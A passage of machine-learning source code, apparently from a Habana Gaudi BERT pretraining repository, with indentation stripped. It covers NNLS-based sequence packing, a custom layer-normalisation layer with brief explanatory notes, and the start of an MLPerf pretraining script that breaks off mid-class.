strategy_set = packing_strategies(0, 1, max_sequence_length, max_sequences_per_pack)
for strategy in strategy_set:
assert(sum(strategy) == max_sequence_length)
num_strategies = len(strategy_set)
print(f"Found {num_strategies} unique packing strategies.")
# Solve the packing equation A@mixture = histogram
A = np.zeros((max_sequence_length, num_strategies), dtype=np.int32)
for i in range(num_strategies):
strategy = strategy_set[i]
for seq_len in strategy:
A[seq_len - 1, i] += 1
# short sequences are inexpensive to add, so should have low residual weights
# to exactly minimize padding use w0 = np.arange(1, max_sequence_length + 1)
# in practice the difference is negligible, but this converges faster
padding_cutoff = 8
w0 = np.ones([max_sequence_length])
# w0 = np.linspace(1, max_sequence_length+1, max_sequence_length)/max_sequence_length # padding minimization weight
w0[:padding_cutoff] = padding_cutoff / (2 * max_sequence_length)
w0 = np.sqrt(w0)
# Starting values for the padding and the mixture
padding = np.zeros([max_sequence_length], dtype=np.int32)
mixture = np.zeros([num_strategies], dtype=np.int32)
b = histogram + padding
# Pack sequences as best as possible, then increase padding accordingly and repeat
for i in range(0, 20):
print(f"\nIteration: {i}: sequences still to pack: ", b.sum())
start = time.time()
partial_mixture, rnorm = optimize.nnls(np.expand_dims(w0, -1) * A, w0 * b)
print(f"Solving nnls took {time.time() - start:3.2f} seconds.")
print(f"Residual norm: {rnorm:3.5e}")
# Update mixture (round the floating point solution to integers)
partial_mixture = np.where(partial_mixture < 2, np.rint(partial_mixture), np.floor(partial_mixture))
# If partial mixture is empty (due to rounding) we follow the gradient
# this usually happens when the number of examples is small i.e. ~100
if partial_mixture.max() == 0:
grad = A.T @ (b * np.arange(1, max_sequence_length + 1))
k = int(b.sum() // 2) + 1
topk = np.argsort(-grad)[:k]
partial_mixture[topk] += 1
# Update mixture
mixture = mixture + partial_mixture
# Compute the residuals
residual = b - A @ partial_mixture
print(f"Max residual: {abs(residual).max()}")
print(f"Residual on first 8 categories: {np.around(residual[:8], 4)}")
print(f"Residual on last 8 categories: {np.around(residual[-8:], 4)}")
# Add padding based on deficit (negative residual)
partial_padding = np.where(residual < 0, -residual, 0)
print(f"Added {(partial_padding*np.arange(1,max_sequence_length+1)).sum():3.2e} tokens of padding.")
padding = padding + partial_padding
# Update the rhs vector (remaining surplus sequences)
b = histogram + padding - A @ mixture
assert np.all(b >= 0), b
# Done iterating
if b.sum() < 100:
break
# Make sure there is no remainder
unpacked_seqlen = np.arange(1, args.max_sequence_length + 1)[b > 0]
# Update the mixture to also covered the unpacked sequences
for l in unpacked_seqlen:
# Get the depth 1 strategy
strategy = sorted([l, args.max_sequence_length - l])
strategy_index = strategy_set.index(strategy)
mixture[strategy_index] += b[l-1]
b = histogram - A @ mixture
padding = np.where(b < 0, -b, 0)
b = histogram + padding - A @ mixture
assert b.sum() == 0
# Analyze result
print("Done solving for packing order".center(80, "_"))
num_padding_tokens = (np.arange(1, max_sequence_length + 1) * padding).sum()
num_padding_tokens_original = (max_sequence_length - sequence_lengths).sum()
print(f"Number of sequences dropped: {b.sum()}")
print(f"Number of strategies utilized: {np.count_nonzero(mixture)}")
new_number_of_samples = int(mixture.sum())
compression = 1 - new_number_of_samples / len(sequence_lengths)
print(f"New number of samples: {new_number_of_samples:3.2f}, original {len(sequence_lengths)}. A compression ratio of {compression:3.3f}")
print(f"The expected speed-up from packing: {1/(1-compression):3.3f}")
upper_bound = 1.0 / (1 - ((1 - sequence_lengths / max_sequence_length).mean()))
print(f"Theoretical upper bound on speed-up: {upper_bound:3.3f}")
avg_sequences_per_sample = ((A.sum(0) * mixture).sum() - padding.sum()) / new_number_of_samples
print(f"Average sequences/sample {avg_sequences_per_sample:3.5f}")
print(f"Added {num_padding_tokens:3.2e} padding tokens. Original dataset used {num_padding_tokens_original:3.2e} padding tokens")
efficiency = (new_number_of_samples*max_sequence_length - num_padding_tokens)/(new_number_of_samples*max_sequence_length)
print(f"Packing efficiency (fraction of real tokens): {efficiency:3.4f}")
print(f"Top 8 strategies")
topK = np.argsort(-mixture)[:8]
for i in topK:
print(f"Strategy {strategy_set[i]} which is used {int(mixture[i])} times")
print("".center(80, "_"))
# Figure out the slicing that each strategy should use
slicing = np.zeros_like(A)
slicing[:, 1:] = np.cumsum(A * mixture, axis=1)[:, :-1]
slicing = slicing.T
mixture = mixture.astype(np.int64)
return strategy_set, mixture, padding, slicing
def slice_examples(examples_by_length, slicing, strategy_set, repeat_counts):
# Divide the work, firstly between the strategies and then into chunks of 50k
slices = []
strategies = []
part_idx = []
for strategy, slice_offsets, repeat_count in zip(strategy_set, slicing, repeat_counts):
if repeat_count == 0:
continue
# Slice out the sequences allocated to this strategy in increments of 50k
num_parts = repeat_count // 50000
num_parts = num_parts + int(repeat_count != num_parts * 50000)
subcounts = (min(50000, repeat_count - 50000 * (i - 1)) for i in range(1, num_parts + 1))
for part_id, part_count in enumerate(subcounts):
examples = []
for k, seq_len in enumerate(strategy):
slice_start = int(slice_offsets[seq_len - 1])
slice_end = slice_start + int(part_count)
slice_offsets[seq_len - 1] = slice_end
examples.append(examples_by_length[seq_len][slice_start:slice_end])
slices.append(examples)
strategies.append(strategy)
part_idx.append(part_id)
return slices, strategies, part_idx
def parallel_pack_according_to_strategy(args, part_idx, strategy, examples):
# Pack the sequences according to the strategy and write them to disk
base_filename = os.path.join(args.output_dir, "strategy_" + "_".join(map(str, strategy)))
filename = base_filename + f"_part_{part_idx}"
lines = []
for i, multi_sequence in enumerate(zip(*examples)):
lines.append(create_multi_sequence_example(multi_sequence, args.max_predictions_per_sequence,
args.max_sequence_length, args.max_sequences_per_pack))
# Write to file
with open(filename, "wb") as f:
f.writelines(lines)
def create_multi_sequence_example(multi_sequence, max_predictions_per_sequence, max_sequence_length, max_sequences_per_pack):
# SEQ
packed_input_ids = np.zeros(max_sequence_length, dtype=np.int32)
packed_input_mask = np.zeros(max_sequence_length, dtype=np.int32)
packed_segment_ids = np.zeros(max_sequence_length, dtype=np.int32)
packed_positions = np.zeros(max_sequence_length, dtype=np.int32)
# MLM
# we are packing up to max_sequences_per_pack, each with a certain percentage of masked tokens
    # in case that percentage is rounded up for all sequences in the pack, we need to add an extra token for
# each sequence in the pack
packed_masked_lm_positions = np.zeros(max_predictions_per_sequence + max_sequences_per_pack, dtype=np.int32)
packed_masked_lm_ids = np.zeros(max_predictions_per_sequence + max_sequences_per_pack, dtype=np.int32)
packed_masked_lm_weights = np.zeros(max_predictions_per_sequence + max_sequences_per_pack, dtype=np.int32)
# NSP
packed_next_sentence_positions = np.zeros(max_sequences_per_pack, dtype=np.int32)
packed_next_sentence_labels = np.zeros(max_sequences_per_pack, dtype=np.int32)
packed_next_sentence_weights = np.zeros(max_sequences_per_pack, dtype=np.int32)
offset = 0
mlm_offset = 0
sequence_index = 1 # used in the input mask
for sequence in multi_sequence:
        # Padding sequences are denoted with None
if sequence is not None:
input_ids, input_mask, segment_ids, masked_lm_positions, masked_lm_ids, masked_lm_weights, next_sentence_labels = sequence
seq_len = input_mask.sum()
# SEQ
packed_input_ids[offset:offset + seq_len] = input_ids[:seq_len]
packed_input_mask[offset:offset + seq_len] = sequence_index
packed_segment_ids[offset:offset + seq_len] = segment_ids[:seq_len]
packed_positions[offset:offset + seq_len] = np.arange(0, seq_len)
# MLM
mlm_len = int(masked_lm_weights.sum())
            assert mlm_offset + mlm_len < max_predictions_per_sequence + max_sequences_per_pack, "Too many LM predictions per sequence"
max_mlm = mlm_offset + mlm_len
packed_masked_lm_positions[mlm_offset:max_mlm] = offset + masked_lm_positions[:mlm_len]
packed_masked_lm_ids[mlm_offset:max_mlm] = masked_lm_ids[:mlm_len]
packed_masked_lm_weights[mlm_offset:max_mlm] = sequence_index
# NSP
packed_next_sentence_positions[sequence_index - 1] = offset
packed_next_sentence_labels[sequence_index - 1] = next_sentence_labels
packed_next_sentence_weights[sequence_index - 1] = 1
# Update offsets
sequence_index += 1
offset += seq_len
mlm_offset = max_mlm
# Pack into binary format and write it
line = reduce(lambda accl, i: accl + struct.pack('<I', i),
chain(packed_input_ids,
packed_input_mask,
packed_segment_ids,
packed_positions,
packed_masked_lm_positions,
packed_masked_lm_ids,
packed_masked_lm_weights,
packed_next_sentence_positions,
packed_next_sentence_labels,
packed_next_sentence_weights), b'')
return line
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input-glob", help="A glob expression for the input files to read in and pack", required=True, type=str)
parser.add_argument("--output-dir", help="The destination folder for the output files", required=True)
parser.add_argument("--random-seed", help="For shuffling the data", default=12345)
parser.add_argument("--max-files", help="At most how many files to process (limited by RAM)", default=100)
parser.add_argument("--duplication-factor", help="Same as the one passed to create input data", default=1, type=int)
parser.add_argument("--max-sequence-length", help="The maximum number of tokens in an example", default=512, type=int)
parser.add_argument("--max-predictions-per-sequence", help="The maximum number of masked tokens in an un-packed example", default=76, type=int)
parser.add_argument("--max-sequences-per-pack", help="The maximum number of sequences per packed example.", choices=[2, 3], default=3, type=int)
args = parser.parse_args()
random.seed(args.random_seed)
# Input files
input_files = glob.glob(args.input_glob)
if len(input_files) > args.max_files:
input_files = np.random.choice(input_files, size=args.max_files, replace=False)
assert len(input_files) > 0
# Load un-packed dataset
sample_sizes = data_file_format(args.max_sequence_length, args.max_predictions_per_sequence)
load_size = 1 if len(input_files) == 1 else 1024
dataset = CachedDataLoader(input_files, sample_sizes, duplication_factor=args.duplication_factor, batch_size=load_size)
# Put examples into bins depending on their sequence lengths and extract the sequence length
# as an array
sequence_lengths = []
examples_by_length = defaultdict(list)
print("Looping through dataset to collect sequence length information...")
for data in dataset:
input_mask = data[1]
batch_of_lengths = input_mask.sum(1).tolist()
for i, length in enumerate(batch_of_lengths):
examples_by_length[length].append([data[k][i] for k in range(len(data))])
sequence_lengths.extend(batch_of_lengths)
sequence_lengths = np.array(sequence_lengths)
# Pass the array of sequence lengths to the packing algorithm
strategy_set, mixture, padding, slicing = get_packing_recipe(sequence_lengths, args.max_sequence_length, args.max_sequences_per_pack)
# Add the calculated padding
for i in range(1, args.max_sequence_length + 1):
examples_by_length[i].extend([None] * int(padding[i - 1]))
# Shuffle the data
for key in examples_by_length:
random.shuffle(examples_by_length[key])
# Pack and store the data
print(f"\nPacking and writing packed dataset to {args.output_dir}.")
# Slice the data into chunks of max 50k packed examples
example_slices, strategies, part_idx = slice_examples(examples_by_length, slicing, strategy_set, mixture)
print(f"Splitting work into {len(part_idx)} parts.")
start = time.time()
with ProcessPoolExecutor(16) as executor:
work = repeat(args), part_idx, strategies, example_slices
for partial_result in executor.map(parallel_pack_according_to_strategy, *work):
pass
print(f"\nDone. Took: {time.time() - start:3.2f} seconds to pack and write dataset.")
```
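For intuition about what `get_packing_recipe` is doing, here is a minimal sketch of the NNLS step on a toy histogram. The tiny `max_sequence_length`, the depth-1/depth-2 strategy enumeration, and the sequence counts are illustrative assumptions, not values taken from the script above.

```python
# Toy sketch of the NNLS packing step (assumptions: tiny max_sequence_length,
# depth-1/depth-2 strategies only, made-up histogram; not the full recipe above).
import numpy as np
from scipy import optimize

max_sequence_length = 8
# histogram[i] = number of sequences whose length is i + 1
histogram = np.array([0, 3, 5, 9, 4, 2, 1, 6], dtype=np.float64)

# Enumerate strategies: a strategy is a list of sequence lengths that fit in one pack
strategy_set = [[length] for length in range(1, max_sequence_length + 1)]
strategy_set += [[a, b]
                 for a in range(1, max_sequence_length + 1)
                 for b in range(a, max_sequence_length + 1)
                 if a + b <= max_sequence_length]

# A[i, j] = how many sequences of length i + 1 are consumed by strategy j
A = np.zeros((max_sequence_length, len(strategy_set)))
for j, strategy in enumerate(strategy_set):
    for length in strategy:
        A[length - 1, j] += 1

# Non-negative least squares: how often to repeat each strategy to cover the histogram
mixture, rnorm = optimize.nnls(A, histogram)
mixture = np.rint(mixture)

residual = histogram - A @ mixture
print("strategy repeat counts:", dict(zip(map(tuple, strategy_set), mixture.astype(int))))
print("residual per length bin:", residual)
```

In the full script, the remaining positive residual is either carried into the next iteration or absorbed as padding, which is exactly the loop shown above.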
#### File: TensorFlow/common/habana_layer_norm.py
```python
from TensorFlow.common.library_loader import habana_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import constraints
from tensorflow.python.keras import initializers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.engine.base_layer import Layer
from tensorflow.python.ops import variables as tf_variables
@ops.RegisterGradient("HabanaLayerNorm")
def _HabanaLayerNorm(op, *grads):
""" Return the gradients for the 3 inputs of HabanaLayerNorm.
Args:
op: HabanaLayerNormOp for which we compute gradients.
        *grads: An argument list of tensors of gradients w.r.t. the outputs,
            with grads[0] as grad_y.
Returns:
grad_x: gradient for x
grad_beta: gradient for beta (bias)
grad_gamma: gradient for gamma (scale)
"""
return habana_ops.habana_layer_norm_grad(
x=op.inputs[0],
grad_in=grads[0],
mean=op.outputs[1],
istd=op.outputs[2],
gamma=op.inputs[2],
epsilon=op.node_def.attr["epsilon"].tensor,
axes=op.node_def.attr["axes"].tensor
)
class HabanaLayerNormalization(Layer):
"""
Has the same behaviour as
https://www.tensorflow.org/api_docs/python/tf/keras/layers/LayerNormalization
It directly uses HabanaLayerNorm op so it works only on Habana Gaudi.
"""
def __init__(self,
axis=-1,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
**kwargs):
super(HabanaLayerNormalization, self).__init__(**kwargs)
if isinstance(axis, (list, tuple)):
self.axis = axis[:]
elif isinstance(axis, int):
self.axis = axis
else:
raise TypeError('Expected an int or a list/tuple of ints for the '
'argument \'axis\', but received: %r' % axis)
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = initializers.get(beta_initializer)
self.gamma_initializer = initializers.get(gamma_initializer)
self.beta_regularizer = regularizers.get(beta_regularizer)
self.gamma_regularizer = regularizers.get(gamma_regularizer)
self.beta_constraint = constraints.get(beta_constraint)
self.gamma_constraint = constraints.get(gamma_constraint)
self.supports_masking = True
def build(self, input_shape):
ndims = len(input_shape)
if ndims is None:
raise ValueError(
'Input shape %s has undefined rank.' % input_shape)
# Convert axis to list and resolve negatives
if isinstance(self.axis, int):
self.axis = [self.axis]
elif isinstance(self.axis, tuple):
self.axis = list(self.axis)
for idx, x in enumerate(self.axis):
if x < 0:
self.axis[idx] = ndims + x
# Validate axes
for x in self.axis:
if x < 0 or x >= ndims:
raise ValueError('Invalid axis: %d' % x)
if len(self.axis) != len(set(self.axis)):
raise ValueError('Duplicate axis: {}'.format(tuple(self.axis)))
param_shape = [input_shape[dim] for dim in self.axis]
if self.scale:
self.gamma = self.add_weight(
name='gamma',
shape=param_shape,
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
trainable=True,
experimental_autocast=False)
else:
self.gamma = None
if self.center:
self.beta = self.add_weight(
name='beta',
shape=param_shape,
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
trainable=True,
experimental_autocast=False)
else:
self.beta = None
self.built = True
def call(self, inputs):
outputs, _, _ = habana_ops.habana_layer_norm(
x=inputs,
beta=self.beta,
gamma=self.gamma,
axes=tensor_util.make_tensor_proto(self.axis),
epsilon=tensor_util.make_tensor_proto(self.epsilon)
)
return outputs
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = {
'axis': self.axis,
'epsilon': self.epsilon,
'center': self.center,
'scale': self.scale,
'beta_initializer': initializers.serialize(self.beta_initializer),
'gamma_initializer': initializers.serialize(self.gamma_initializer),
'beta_regularizer': regularizers.serialize(self.beta_regularizer),
'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
'beta_constraint': constraints.serialize(self.beta_constraint),
'gamma_constraint': constraints.serialize(self.gamma_constraint)
}
base_config = super(HabanaLayerNormalization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
```
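A brief usage note: the sketch below shows how this layer might be dropped into a Keras model in place of `tf.keras.layers.LayerNormalization`. It assumes `load_habana_module()` has already been called so that `habana_ops` resolves, and that the code runs on Habana Gaudi; the shapes and epsilon are illustrative values, not requirements of the layer.

```python
# Illustrative sketch only; requires Habana Gaudi and a prior load_habana_module() call.
import tensorflow as tf
from TensorFlow.common.habana_layer_norm import HabanaLayerNormalization

inputs = tf.keras.Input(shape=(128, 768))      # (sequence length, hidden size) - example values
hidden = tf.keras.layers.Dense(768)(inputs)
# Normalize over the last axis, mirroring tf.keras.layers.LayerNormalization defaults
normed = HabanaLayerNormalization(axis=-1, epsilon=1e-12)(hidden)
model = tf.keras.Model(inputs, normed)
model.summary()
```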
#### File: nlp/bert/run_pretraining.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import TensorFlow.nlp.bert.modeling as modeling
import TensorFlow.nlp.bert.optimization as optimization
import tensorflow as tf
import glob
from TensorFlow.nlp.bert.utils.utils import LogEvalRunHook
import TensorFlow.nlp.bert.utils.dllogger_class as dllogger_class
from dllogger import Verbosity
import math
import numbers
import numpy as np
from tensorflow.core.protobuf import rewriter_config_pb2
from TensorFlow.common.tb_utils import ExamplesPerSecondEstimatorHook, write_hparams_v1
from TensorFlow.common.horovod_helpers import hvd, hvd_init, hvd_size, hvd_rank, horovod_enabled, comm_local_rank
from TensorFlow.common.str2bool import condition_env_var
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, '..', '..'))
from TensorFlow.common.library_loader import load_habana_module
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
class TrainableVarsAllreducingHookPreOpt(tf.compat.v1.estimator.SessionRunHook):
def __init__(self, num_accumulation_steps=1):
super(TrainableVarsAllreducingHookPreOpt, self).__init__()
# Modify this collection in order to allreduce other set of variables
trainable_vars = tf.compat.v1.trainable_variables()
allreduced_trainable_var_ops = [ v.assign(hvd.allreduce(v)) for v in trainable_vars]
self.allreduce_trainable_vars_op = tf.group(*allreduced_trainable_var_ops)
self.num_accumulation_steps = num_accumulation_steps
self.current_iteration = 1
def before_run(self, run_context):
if self.current_iteration % self.num_accumulation_steps == 0:
return tf.compat.v1.train.SessionRunArgs(self.allreduce_trainable_vars_op)
def after_run(self, run_context, run_values):
self.current_iteration += 1
trainable_vars_allreduce_result = run_values.results
def init_flags():
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_integer("samples_between_eval", 150000, "MLPerf Evaluation frequency in samples.")
flags.DEFINE_float("stop_threshold", 0.720, "MLperf Mask LM accuracy target")
flags.DEFINE_integer("samples_start_eval", 3000000, " Required samples to start evaluation for MLPerf.")
flags.DEFINE_bool("enable_device_warmup", False, " Enable device warmup for MLPerf.")
flags.DEFINE_string(
"input_files_dir", None,
"Directory with input files, comma separated or single directory.")
flags.DEFINE_string(
"eval_files_dir", None,
"Directory with eval files, comma separated or single directory. ")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string(
"dllog_path", "/results/bert_dllog.json",
"filename where dllogger writes to")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_string(
"eval_checkpoint_path", None,
"eval checkpoint path.")
flags.DEFINE_bool(
'is_dist_eval_enabled', False, 'IF true enable distributed evaluation')
flags.DEFINE_string(
"optimizer_type", "lamb",
"Optimizer used for training - LAMB or ADAM")
flags.DEFINE_integer(
"max_seq_length", 512,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
flags.DEFINE_integer(
"max_predictions_per_seq", 80,
"Maximum number of masked LM predictions per sequence. "
"Must match data generation.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")
flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("save_summary_steps", 1,
"How often to save the summary data.")
flags.DEFINE_integer("display_loss_steps", 10,
"How often to print loss")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")
flags.DEFINE_integer("num_accumulation_steps", 1,
"Number of accumulation steps before gradient update."
"Global batch size = num_accumulation_steps * train_batch_size")
flags.DEFINE_bool("allreduce_post_accumulation", False, "Whether to all reduce after accumulation of N steps or after each step")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the trainable parameters are printed")
flags.DEFINE_bool("horovod", False, "Whether to use Horovod for multi-gpu runs")
flags.DEFINE_bool("report_loss", True, "Whether to report total loss during training.")
flags.DEFINE_bool("manual_fp16", False, "Whether to use fp32 or fp16 arithmetic on GPU. "
"Manual casting is done instead of using AMP")
flags.DEFINE_bool("amp", True, "Whether to enable AMP ops. When false, uses TF32 on A100 and FP32 on V100 GPUS.")
flags.DEFINE_bool("use_xla", True, "Whether to enable XLA JIT compilation.")
flags.DEFINE_integer("init_loss_scale", 2**32, "Initial value of loss scale if mixed precision training")
def get_mllog_mlloger():
from mlperf_logging import mllog
str_hvd_rank = str(hvd.rank()) if horovod_enabled() else "0"
mllogger = mllog.get_mllogger()
filenames = os.path.normpath(FLAGS.output_dir) + "/result_rank_" + str_hvd_rank + ".txt"
mllog.config(filename=filenames)
workername = "worker" + str_hvd_rank
mllog.config(
default_namespace = workername,
default_stack_offset = 1,
default_clear_line = False,
root_dir = os.path.normpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "..")))
return mllogger, mllog
def past_stop_threshold(stop_threshold, eval_metric):
"""Return a boolean representing whether a model should be stopped.
Args:
stop_threshold: float, the threshold above which a model should stop
training.
eval_metric: float, the current value of the relevant metric to check.
Returns:
True if training should stop, False otherwise.
Raises:
ValueError: if either stop_threshold or eval_metric is not a number
"""
if stop_threshold is None:
return False
if not isinstance(stop_threshold, numbers.Number):
raise ValueError("Threshold for checking stop conditions must be a number.")
if not isinstance(eval_metric, numbers.Number):
raise ValueError("Eval metric being checked against stop conditions "
"must be a number.")
if eval_metric >= stop_threshold:
tf.compat.v1.logging.info(
"Stop threshold of {} was passed with metric value {}.".format(
stop_threshold, eval_metric))
return True
return False
#_NUM_EXAMPLES_NAME = "num_examples"
# report samples/sec, total loss and learning rate during training
class _LogSessionRunHook(tf.estimator.SessionRunHook):
def __init__(self, global_batch_size, num_accumulation_steps, dllogging, display_every=10,
save_ckpt_steps=1000, report_loss=True, hvd_rank=-1):
self.global_batch_size = global_batch_size
self.display_every = display_every
self.save_ckpt_steps = save_ckpt_steps
self.hvd_rank = hvd_rank
self.num_accumulation_steps = num_accumulation_steps
self.dllogging = dllogging
self.report_loss = report_loss
self.skip_iters = 6
def after_create_session(self, session, coord):
self.elapsed_secs = 0.0 #elapsed seconds between every print
self.count = 0 # number of global steps between every print
self.all_count = 0 #number of steps (including accumulation) between every print
self.loss = 0.0 # accumulation of loss in each step between every print
self.total_time = 0.0 # total time taken to train (excluding warmup + ckpt saving steps)
self.step_time = 0.0 # time taken per step
self.init_global_step = session.run(tf.compat.v1.train.get_global_step()) # training starts at init_global_step
self.skipped = 0
def before_run(self, run_context):
if horovod_enabled() and hvd_rank() != 0:
return
self.t0 = time.time()
if self.num_accumulation_steps <= 1:
if FLAGS.manual_fp16 or FLAGS.amp:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0', 'loss_scale:0'])
else:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0'])
else:
if FLAGS.manual_fp16 or FLAGS.amp:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'update_step:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0', 'loss_scale:0'])
else:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'update_step:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0'])
def after_run(self, run_context, run_values):
if horovod_enabled() and hvd_rank() != 0:
return
run_time = time.time() - self.t0
if self.num_accumulation_steps <=1:
if FLAGS.manual_fp16 or FLAGS.amp:
self.global_step, total_loss, lr, nsp_loss, mlm_loss, loss_scaler = run_values.results
else:
self.global_step, total_loss, lr, nsp_loss, mlm_loss = run_values. \
results
update_step = True
else:
if FLAGS.manual_fp16 or FLAGS.amp:
self.global_step, update_step, total_loss, lr, nsp_loss, mlm_loss, loss_scaler = run_values.results
else:
self.global_step, update_step, total_loss, lr, nsp_loss, mlm_loss = run_values.\
results
self.elapsed_secs += run_time
self.step_time += run_time
print_step = self.global_step + 1 # One-based index for printing.
self.loss += total_loss
self.all_count += 1
if update_step:
self.count += 1
# Removing first six steps after every checkpoint save from timing
if (self.global_step - self.init_global_step) % self.save_ckpt_steps < self.skip_iters:
print("Skipping time record for ", self.global_step, " due to checkpoint-saving/warmup overhead")
self.skipped += 1
else:
self.total_time += self.step_time
self.step_time = 0.0 #Reset Step Time
if (print_step == 1 or print_step % self.display_every == 0):
dt = self.elapsed_secs / self.count
sent_per_sec = self.global_batch_size / dt
avg_loss_step = self.loss / self.all_count
if self.hvd_rank >= 0 and FLAGS.report_loss:
if FLAGS.manual_fp16 or FLAGS.amp:
self.dllogging.logger.log(step=(print_step),
data={"Rank": int(self.hvd_rank), "throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr), "loss_scaler":int(loss_scaler)},
verbosity=Verbosity.DEFAULT)
else:
self.dllogging.logger.log(step=int(print_step),
data={"Rank": int(self.hvd_rank), "throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr)},
verbosity=Verbosity.DEFAULT)
else:
if FLAGS.manual_fp16 or FLAGS.amp:
self.dllogging.logger.log(step=int(print_step),
data={"throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr), "loss_scaler":int(loss_scaler)},
verbosity=Verbosity.DEFAULT)
else:
self.dllogging.logger.log(step=int(print_step),
data={"throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr)},
verbosity=Verbosity.DEFAULT)
self.elapsed_secs = 0.0
self.count = 0
self.loss = 0.0
self.all_count = 0
train_op_name = None
class MLPerfHook(tf.estimator.SessionRunHook):
def __init__(self, global_batch_size, num_accumulation_steps, num_train_steps, samples_between_eval,
weight_decay_rate, beta_1, beta_2, epsilon, power, enable_device_warmup):
'''
global_batch_size = train_batch_size * num_accumulation_steps * num_of_devices
        num_train_steps = number of training steps; each step consumes global_batch_size samples
        samples_between_eval = total number of samples in each evaluation block
'''
mllogger, mllog = get_mllog_mlloger()
mllogger.event(key=mllog.constants.CACHE_CLEAR)
mllogger.start(key=mllog.constants.INIT_START)
mllogger.event(key=mllog.constants.GLOBAL_BATCH_SIZE, value=global_batch_size)
mllogger.event(key=mllog.constants.TRAIN_SAMPLES, value=global_batch_size * FLAGS.num_train_steps)
mllogger.event(key=mllog.constants.MAX_SEQUENCE_LENGTH, value=FLAGS.max_seq_length)
mllogger.event(key='max_predictions_per_seq', value=FLAGS.max_predictions_per_seq)
mllogger.event(key=mllog.constants.GRADIENT_ACCUMULATION_STEPS, value=FLAGS.num_accumulation_steps)
mllogger.event(key=mllog.constants.OPT_LR_TRAINING_STEPS, value=FLAGS.num_train_steps)
mllogger.event(key=mllog.constants.NUM_WARMUP_STEPS, value=FLAGS.num_warmup_steps)
mllogger.event(key=mllog.constants.OPT_LR_WARMUP_STEPS, value=FLAGS.num_warmup_steps)
mllogger.event(key=mllog.constants.START_WARMUP_STEP, value=0)
mllogger.event(key=mllog.constants.OPT_BASE_LR, value=FLAGS.learning_rate if not FLAGS.horovod else FLAGS.learning_rate * hvd_size())
mllogger.event(key=mllog.constants.EVAL_SAMPLES, value=10000)
mllogger.event(key=mllog.constants.OPT_LAMB_BETA_1, value=beta_1)
mllogger.event(key=mllog.constants.OPT_LAMB_BETA_2, value=beta_2)
mllogger.event(key=mllog.constants.OPT_LAMB_LR_DECAY_POLY_POWER, value=power)
mllogger.event(key=mllog.constants.OPT_LAMB_WEIGHT_DECAY, value=weight_decay_rate)
mllogger.event(key="opt_epsilon", value=epsilon)
        mllogger.end(key=mllog.constants.INIT_STOP)
self.mllogger = mllogger
self.mllog = mllog
self.chpt_timestamp_dict={}
self.run_start_timestamp=None
self.checkpoint_timestamp_dict={}
self.block_stop_timestamp_dict={}
num_steps_between_eval = math.ceil(samples_between_eval / global_batch_size)
n_loops = math.ceil(num_train_steps / num_steps_between_eval)
schedule = [num_steps_between_eval for _ in range(int(n_loops))]
schedule[-1] = num_train_steps - sum(schedule[:-1])
self.num_accumulation_steps = num_accumulation_steps
self.num_steps_between_eval = num_steps_between_eval
self.schedule = schedule
self.cycle_index = 0
